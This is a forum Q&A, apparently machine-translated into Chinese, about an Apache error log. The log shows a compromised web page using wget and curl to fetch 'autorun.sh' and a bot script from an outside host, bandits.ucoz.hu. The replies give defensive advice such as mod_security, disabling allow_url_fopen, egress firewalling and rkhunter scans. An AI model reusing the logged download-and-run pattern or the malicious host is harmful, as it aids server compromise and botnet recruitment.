Linux
阿帕奇錯誤日誌
我正面臨著apache的問題。以下日誌顯示在 error_log 文件中。
--15:01:26-- http://bandits.ucoz.hu/autorun.sh Resolving bandits.ucoz.hu... 193.109.247.50 Connecting to bandits.ucoz.hu|193.109.247.50|:80... connected. HTTP request sent, awaiting response... 200 OK Length: 396 [application/octet-stream] Saving to: `autorun.sh' 0K 100% 51.6M=0s 15:01:26 (51.6 MB/s) - `autorun.sh' saved [396/396] sh: fetch: command not found % Total % Received % Xferd Average Speed Time Time Time Current Dload Upload Total Spent Left Speed 100 396 100 396 0 0 70387 0 --:--:-- --:--:-- --:--:-- 0 connected. HTTP request sent, awaiting response... 200 OK Length: 28762 (28K) [text/plain] Saving to: `b0t3.txt' 0K .......... .......... ........ 100% 8.75M=0.003s 15:01:27 (8.75 MB/s) - `b0t3.txt' saved [28762/28762] sh: fetch: command not found % Total % Received % Xferd Average Speed Time Time Time Current Dload Upload Total Spent Left Speed 100 28762 100 28762 0 0 3434k 0 --:--:-- --:--:-- --:--:-- 13.1M sh: /usr/bin/lwp-download: /usr/bin/perl: bad interpreter: Permission denied sh: /usr/bin/perl: Permission denied --15:01:27-- http://bandits.ucoz.hu/autorun.sh Resolving bandits.ucoz.hu... 193.109.247.50 Connecting to bandits.ucoz.hu|193.109.247.50|:80... connected. HTTP request sent, awaiting response... 200 OK Length: 396 [application/octet-stream] Saving to: `autorun.sh' 0K 100% 31.8M=0s 15:01:27 (31.8 MB/s) - `autorun.sh' saved [396/396] sh: fetch: command not found % Total % Received % Xferd Average Speed Time Time Time Current Dload Upload Total Spent Left Speed 100 396 100 396 0 0 48768 0 --:--:-- --:--:-- --:--:-- 0
我該如何預防這個問題?
似乎有人試圖使用您可能易受攻擊的網頁之一下載和執行 perl 腳本。- 試圖禁用執行所有解釋器(perl、phyton、curl、c 等)。
- 我假設它可能是 apache + php,如果是,您可能被禁用:allow_url_fopen = Off,禁用通過 PHP 下載。
- 添加 httpd mod_security
- 修復了易受攻擊的網頁腳本
- 為某些 ips/埠打開傳出防火牆
您在某個地方有一個腳本可以抓取看起來像殭屍網路的腳本,試圖將其保存並在本地執行。這沒有發生,因為它在錯誤文件中。
- 屏蔽土匪ip$$ though there are probably several more $$
- 找到那個腳本$$ grep for the bandits url $$
- 找出該腳本用於檢索文件的內容
$$ block it if you can $$
- 使用 rkhunter 下載和掃描
- 查看您的郵件隊列
- 注意你的程序列表中的奇怪的東西
-肖恩